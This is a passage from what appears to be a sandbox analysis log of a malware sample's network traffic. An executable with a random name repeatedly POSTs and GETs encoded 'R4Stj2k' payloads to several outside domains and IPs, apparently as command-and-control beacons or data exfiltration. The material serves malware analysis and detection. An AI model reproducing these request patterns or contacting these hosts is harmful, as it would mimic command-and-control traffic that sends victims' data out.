                                                          Data Ascii: R4Stj2k=gmPPOGT6pgqjnnXlL4CqZQj2A80O823tCod2NZmsaMqi//eUpPeiBq2zmHpqgcLbDegOH+UweblQbvEYZ9XaHZ/VmMDdXrsgBfL29CU80w5yAJFzEqVjQhqqCzeHjB0489rGeaGrJI6leAai5JOgu44sZr0mCZrEOg1SRGA8g/I+8njbCVYyCLqR6OSFWO63Q6SJfrQvLz1l7LY3/wIA0AHzDd91
                                                          Jan 16, 2025 09:25:47.652390003 CET | 309 | IN | HTTP/1.1 403 Forbidden
                                                          Server: nginx
                                                          Date: Wed, 15 Jan 2025 16:25:12 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 166
                                                          Connection: close
                                                          Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          19 | 192.168.2.5 | 49994 | 154.197.162.239 | 80 | 3304 | C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 16, 2025 09:25:49.660794973 CET | 1789 | OUT | POST /cf9p/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate
                                                          Host: www.investshares.net
                                                          Origin: http://www.investshares.net
                                                          Cache-Control: max-age=0
                                                          Content-Length: 1244
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.investshares.net/cf9p/
                                                          User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                          Data Raw: 52 34 53 74 6a 32 6b 3d 67 6d 50 50 4f 47 54 36 70 67 71 6a 6e 6e 58 6c 4c 34 43 71 5a 51 6a 32 41 38 30 4f 38 32 33 74 43 6f 64 32 4e 5a 6d 73 61 4d 69 69 2f 4a 4b 55 6f 75 65 69 41 71 32 7a 6c 48 70 72 67 63 4b 44 44 65 70 48 48 2b 52 4e 65 64 70 51 55 76 59 59 4a 4d 58 61 4f 5a 2f 56 6b 4d 44 59 64 4c 73 70 42 66 62 36 39 43 6b 38 30 77 35 79 41 50 70 7a 45 2b 42 6a 4c 68 71 70 54 7a 65 62 75 68 31 56 38 39 79 35 65 61 54 55 49 34 61 6c 65 67 4b 69 37 66 69 67 74 59 34 71 59 72 30 2b 43 5a 6d 47 4f 67 70 34 52 46 64 5a 67 2f 77 2b 2b 42 2b 6c 52 68 55 31 42 4b 2b 79 78 38 61 45 55 4a 4f 4a 52 4b 57 44 44 73 78 4f 4b 69 41 4d 39 50 38 53 78 6a 70 33 6a 32 72 42 55 74 4d 70 55 68 61 74 6e 2b 31 63 51 59 70 62 32 6b 46 73 71 47 72 2b 59 2f 30 38 6f 79 45 2f 4f 41 54 43 64 47 6c 73 50 58 44 38 55 45 2f 45 76 78 2f 62 44 59 53 66 2b 35 47 56 71 44 4a 6d 74 75 2f 4b 75 50 71 79 74 59 49 61 56 51 39 70 70 63 37 32 61 62 37 54 76 45 45 37 74 6b 6a 6e 7a 45 4c 68 53 31 6c 30 72 71 48 57 45 70 37 4d 6e 4d [TRUNCATED]
                                                          Data Ascii: R4Stj2k= [TRUNCATED]
                                                          Jan 16, 2025 09:25:50.221178055 CET | 309 | IN | HTTP/1.1 403 Forbidden
                                                          Server: nginx
                                                          Date: Wed, 15 Jan 2025 16:25:14 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 166
                                                          Connection: close
                                                          Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          20 | 192.168.2.5 | 49995 | 154.197.162.239 | 80 | 3304 | C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 16, 2025 09:25:52.210787058 CET | 488 | OUT | GET /cf9p/?R4Stj2k=tknvN2jlhTuvpXXfB7aTVyatH+optGyLNYYXG7/rIeGG9fe7kNXrAZC6u3EcgYD6CfYKVegcRI1iRuMeH9uFI57Xl4izZbo5Nf+t7hBu9DYDZsVVcrRpMjG9JV+RkwAygg==&ml=PF-8nXUHD HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Host: www.investshares.net
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                          Jan 16, 2025 09:25:52.794837952 CET | 141 | IN | HTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Wed, 15 Jan 2025 16:25:17 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 0
                                                          Connection: close


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          21 | 192.168.2.5 | 49996 | 134.122.133.80 | 80 | 3304 | C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 16, 2025 09:26:06.792810917 CET | 764 | OUT | POST /jpjz/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate
                                                          Host: www.jrcov55qgcxp5fwa.top
                                                          Origin: http://www.jrcov55qgcxp5fwa.top
                                                          Cache-Control: max-age=0
                                                          Content-Length: 208
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.jrcov55qgcxp5fwa.top/jpjz/
                                                          User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                          Data Ascii: R4Stj2k=Muqh5VPLPtCMnivfD+Itk+9uDz4wmnluTDk23WlG/zpx7ZrmyViwzUOP1z1QMFrRwih/oVhKJoeWxNbYj4XdfSWgJbzXYj2Gjp2qiTudmGaTNfWR9gaeLuWeGzdrCZBJONbo4LAkHmXPjwLJxLSdH561vqZbUfzdtCBjus6j7aNbwFtzOHDDvvRbaFPB9nHDYpfhqUc=
                                                          Jan 16, 2025 09:26:07.657269955 CET | 306 | IN | HTTP/1.1 404 Not Found
                                                          Content-Length: 146
                                                          Content-Type: text/html
                                                          Date: Thu, 16 Jan 2025 08:26:07 GMT
                                                          Server: nginx
                                                          X-Cache: BYPASS
                                                          Connection: close
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          22 | 192.168.2.5 | 49997 | 134.122.133.80 | 80 | 3304 | C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 16, 2025 09:26:09.338294983 CET | 784 | OUT | POST /jpjz/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate
                                                          Host: www.jrcov55qgcxp5fwa.top
                                                          Origin: http://www.jrcov55qgcxp5fwa.top
                                                          Cache-Control: max-age=0
                                                          Content-Length: 228
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.jrcov55qgcxp5fwa.top/jpjz/
                                                          User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                          Data Ascii: R4Stj2k=Muqh5VPLPtCMmBnfBZktie9taT4wzXlqTDo23XhW/m5x68XmzQOwmUOPtj1RR1rKwikKoQZKJoKWxPzYjr/SeCWiF7zVWD2Gjp2qiT7VmGSTR+mRvSydIuWdHzdrUpBNONaL4OZ5HjTPj1nJyaSeeJ6zrqYPT/+GsU0osMj9v51HxzcZUlLr8P9jKWH2sXmqCKPR0DLuIh0A7a5s4ReABm6Af/tB
                                                          Jan 16, 2025 09:26:10.214730024 CET | 306 | IN | HTTP/1.1 404 Not Found
                                                          Content-Length: 146
                                                          Content-Type: text/html
                                                          Date: Thu, 16 Jan 2025 08:26:10 GMT
                                                          Server: nginx
                                                          X-Cache: BYPASS
                                                          Connection: close
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          23 | 192.168.2.5 | 49998 | 134.122.133.80 | 80 | 3304 | C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 16, 2025 09:26:11.889775038 CET | 1801 | OUT | POST /jpjz/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate
                                                          Host: www.jrcov55qgcxp5fwa.top
                                                          Origin: http://www.jrcov55qgcxp5fwa.top
                                                          Cache-Control: max-age=0
                                                          Content-Length: 1244
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.jrcov55qgcxp5fwa.top/jpjz/
                                                          User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                          Data Ascii: R4Stj2k= [TRUNCATED]
                                                          Jan 16, 2025 09:26:12.768207073 CET | 306 | IN | HTTP/1.1 404 Not Found
                                                          Content-Length: 146
                                                          Content-Type: text/html
                                                          Date: Thu, 16 Jan 2025 08:26:12 GMT
                                                          Server: nginx
                                                          X-Cache: BYPASS
                                                          Connection: close
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          24 | 192.168.2.5 | 49999 | 134.122.133.80 | 80 | 3304 | C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 16, 2025 09:26:14.428988934 CET | 492 | OUT | GET /jpjz/?R4Stj2k=BsCB6j6XIP/wuAb0HPY9posnISoRnnooDDFnz1MrtzBPzJTq92en/EOyrjYaLx3w2H4L+FlVDICDydTs7KXcXHKBDP7KaxaAnbP80R2HqmHJM+3O9yicYOmuDElRRJIzTA==&ml=PF-8nXUHD HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Host: www.jrcov55qgcxp5fwa.top
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                          Jan 16, 2025 09:26:15.294491053 CET | 306 | IN | HTTP/1.1 404 Not Found
                                                          Content-Length: 146
                                                          Content-Type: text/html
                                                          Date: Thu, 16 Jan 2025 08:26:15 GMT
                                                          Server: nginx
                                                          X-Cache: BYPASS
                                                          Connection: close
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          25 | 192.168.2.5 | 50000 | 47.83.1.90 | 80 | 3304 | C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 16, 2025 09:26:20.353866100 CET | 737 | OUT | POST /ctdy/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate
                                                          Host: www.adadev.info
                                                          Origin: http://www.adadev.info
                                                          Cache-Control: max-age=0
                                                          Content-Length: 208
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.adadev.info/ctdy/
                                                          User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                          Data Ascii: R4Stj2k=0anqji6gQT7yL0vLzQNMtIeNy+oIKXZSmHc+IjW9LOzBQ8aLU18IHqxgQLikTlK1C21EtFqcogogQQWCGiQ7PR0S12oz60/t9J92H+eHEFh0nIEj6OLpNd/0CfH1PjC6fDAKOBZ5xMjb3tD17VWZwuq04ERUHpx+Jeh8qd6g6X0MSNpNp65JyvfVJ2zDSN0y5VkcrHc=
                                                          Jan 16, 2025 09:26:21.783191919 CET | 137 | IN | HTTP/1.1 404 Not Found
                                                          Server: nginx/1.18.0
                                                          Date: Thu, 16 Jan 2025 08:26:21 GMT
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Data Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          26 | 192.168.2.5 | 50001 | 47.83.1.90 | 80 | 3304 | C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 16, 2025 09:26:22.909233093 CET | 757 | OUT | POST /ctdy/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate
                                                          Host: www.adadev.info
                                                          Origin: http://www.adadev.info
                                                          Cache-Control: max-age=0
                                                          Content-Length: 228
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.adadev.info/ctdy/
                                                          User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                          Data Ascii: R4Stj2k=0anqji6gQT7yZFfL/XZMvoeMsuoITHZemHQ+Im2TL8XBTdqLV08IEqxgYrilNVK6Cx8ntEWcogsgQRmCGTQ8OB0Q8Woxnk/t9J92H+LiEFp0m7sj6vLuOd/zSPH1YzCEfDA4OEkixOrb3sz16EWe6uq2l0QIXJQrIZBh3e7ck04VebYnzYxhhPztZl70D9Vbj20s1QLguZ253eWmCDudU+wMrfXz
                                                          Jan 16, 2025 09:26:24.350336075 CET | 137 | IN | HTTP/1.1 404 Not Found
                                                          Server: nginx/1.18.0
                                                          Date: Thu, 16 Jan 2025 08:26:24 GMT
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Data Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          27 | 192.168.2.5 | 50002 | 47.83.1.90 | 80 | 3304 | C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 16, 2025 09:26:25.452495098 CET | 1774 | OUT | POST /ctdy/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate
                                                          Host: www.adadev.info
                                                          Origin: http://www.adadev.info
                                                          Cache-Control: max-age=0
                                                          Content-Length: 1244
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.adadev.info/ctdy/
                                                          User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                          Data Ascii: R4Stj2k= [TRUNCATED]


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          28 | 192.168.2.5 | 50003 | 47.83.1.90 | 80 | 3304 | C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 16, 2025 09:26:27.991368055 CET | 483 | OUT | GET /ctdy/?ml=PF-8nXUHD&R4Stj2k=5YPKgWGFQCLPNGrLxhxItoeNmOBaThMtkX9bUS/ECNXraKmEQnwhGYNyQa7ZIE66IC9AyTOQsA8Uagq2DQsZHUsO9SJV5WPis6dAAfaCKHAM87QjltbifMPVPoLSKwbdMw== HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Host: www.adadev.info
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                          Jan 16, 2025 09:26:29.598229885 CET | 139 | IN | HTTP/1.1 567 unknown
                                                          Server: nginx/1.18.0
                                                          Date: Thu, 16 Jan 2025 08:26:29 GMT
                                                          Content-Length: 17
                                                          Connection: close
                                                          Data Raw: 52 65 71 75 65 73 74 20 74 6f 6f 20 6c 61 72 67 65
                                                          Data Ascii: Request too large


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          29 | 192.168.2.5 | 50004 | 188.114.96.3 | 80 | 3304 | C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 16, 2025 09:26:34.657100916 CET | 740 | OUT | POST /8rr3/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate
                                                          Host: www.cifasnc.info
                                                          Origin: http://www.cifasnc.info
                                                          Cache-Control: max-age=0
                                                          Content-Length: 208
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.cifasnc.info/8rr3/
                                                          User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                          Data Ascii: R4Stj2k=vLUBlmPRKk2byeF/qgF44voCPRcRwe2iVepdlR/ZvRtaTU48mdes5KkJJSiiYK3VpLvhBWHpeW/wfnVqA9oW+2X5J0bY4M/0VVPpoC1n64PnDW4wfMCfinc0BWoffQrilKeOb++ruvYqey7PVY1RsZdlnNyoX89Gijr+relwlIG0LzHdyn7V2VNnerELkp4EfT4+ZIQ=
                                                          Jan 16, 2025 09:26:35.237520933 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                          Date: Thu, 16 Jan 2025 08:26:35 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          x-pingback: http://cifasnc.info/xmlrpc.php
                                                          expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                          last-modified: Thu, 16 Jan 2025 08:26:35 GMT
                                                          cache-control: no-cache, must-revalidate, max-age=0
                                                          pragma: no-cache
                                                          vary: Accept-Encoding,User-Agent
                                                          x-turbo-charged-by: LiteSpeed
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cbQxDok4yUYG5qBuv3QGBZTXN1BAzF9TZV3kRgA4ojlqeLvEIwQjatNIdLBaUnytMJnkXii0x23tJCFBdpvWR7MbmcdNSLBirGb8%2Bu6R2qxT1r4racD05ooIrYr%2FvLWeA9T%2B"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 902cb8b11de48268-IAD
                                                          Content-Encoding: gzip
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=7345&min_rtt=7345&rtt_var=3672&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=740&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Jan 16, 2025 09:26:35.238478899 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          30 | 192.168.2.5 | 50005 | 188.114.96.3 | 80 | 3304 | C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 16, 2025 09:26:37.201065063 CET | 760 | OUT | POST /8rr3/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate
                                                          Host: www.cifasnc.info
                                                          Origin: http://www.cifasnc.info
                                                          Cache-Control: max-age=0
                                                          Content-Length: 228
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.cifasnc.info/8rr3/
                                                          User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                          Jan 16, 2025 09:26:37.767164946 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                          Date: Thu, 16 Jan 2025 08:26:37 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          x-pingback: http://cifasnc.info/xmlrpc.php
                                                          expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                          last-modified: Thu, 16 Jan 2025 08:26:37 GMT
                                                          cache-control: no-cache, must-revalidate, max-age=0
                                                          pragma: no-cache
                                                          vary: Accept-Encoding,User-Agent
                                                          x-turbo-charged-by: LiteSpeed
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5X2XF4qtA7oxMelL%2BA8PdxuK12d6KTXVymiAWlp9KayTNNIKFTKCQTKJN2Y%2B8WaVXbjjQdfrKWlcYqrqs23pry55dut8fRChm0lmO0d%2FRzaHYe0%2Fmw1M%2BjVb27jfWbeC5XxI"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 902cb8c0f8c39c7c-IAD
                                                          Content-Encoding: gzip
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=7210&min_rtt=7210&rtt_var=3605&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=760&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          31 | 192.168.2.5 | 50006 | 188.114.96.3 | 80 | 3304 | C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 16, 2025 09:26:39.750276089 CET | 1777 | OUT | POST /8rr3/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate
                                                          Host: www.cifasnc.info
                                                          Origin: http://www.cifasnc.info
                                                          Cache-Control: max-age=0
                                                          Content-Length: 1244
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.cifasnc.info/8rr3/
                                                          User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                          Jan 16, 2025 09:26:40.316966057 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                          Date: Thu, 16 Jan 2025 08:26:40 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          x-pingback: http://cifasnc.info/xmlrpc.php
                                                          expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                          last-modified: Thu, 16 Jan 2025 08:26:40 GMT
                                                          cache-control: no-cache, must-revalidate, max-age=0
                                                          pragma: no-cache
                                                          vary: Accept-Encoding,User-Agent
                                                          x-turbo-charged-by: LiteSpeed
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ru8W4zVBt6ZgXdSWpV4VK9ml8vjiO1ctc7rH7xDNUlCK%2BMFxRYvE9TxbVDd6V2wYvxoitSssnk0Zi%2F6tEeemvKMHkWgmVVuDPTZV7CcuOZnHsuP9u4EwPIFkwbRMFYv5n%2Bg%2F"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 902cb8d109aeab7c-YYZ
                                                          Content-Encoding: gzip
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=14180&min_rtt=14180&rtt_var=7090&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1777&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          32 | 192.168.2.5 | 50007 | 188.114.96.3 | 80 | 3304 | C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 16, 2025 09:26:42.289607048 CET | 484 | OUT | GET /8rr3/?R4Stj2k=iJ8hmWjdEFuk0u06tRtBw99RNA0cmJToU8wTtz6qpCRnWDAwsuGK654yLyD0CfrWg+eEASr+Wzr+b0deN6ZH4gP8KF2Qn8j/cmS57RgWwvqcfmQWCIyf50xkCSEufT28mA==&ml=PF-8nXUHD HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Host: www.cifasnc.info
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                          Jan 16, 2025 09:26:42.842978954 CET | 1230 | IN | HTTP/1.1 301 Moved Permanently
                                                          Date: Thu, 16 Jan 2025 08:26:42 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          x-pingback: http://cifasnc.info/xmlrpc.php
                                                          expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                          last-modified: Thu, 16 Jan 2025 08:26:42 GMT
                                                          cache-control: no-cache, must-revalidate, max-age=0
                                                          pragma: no-cache
                                                          location: http://cifasnc.info/8rr3/?R4Stj2k=iJ8hmWjdEFuk0u06tRtBw99RNA0cmJToU8wTtz6qpCRnWDAwsuGK654yLyD0CfrWg+eEASr+Wzr+b0deN6ZH4gP8KF2Qn8j/cmS57RgWwvqcfmQWCIyf50xkCSEufT28mA==&ml=PF-8nXUHD
                                                          vary: User-Agent
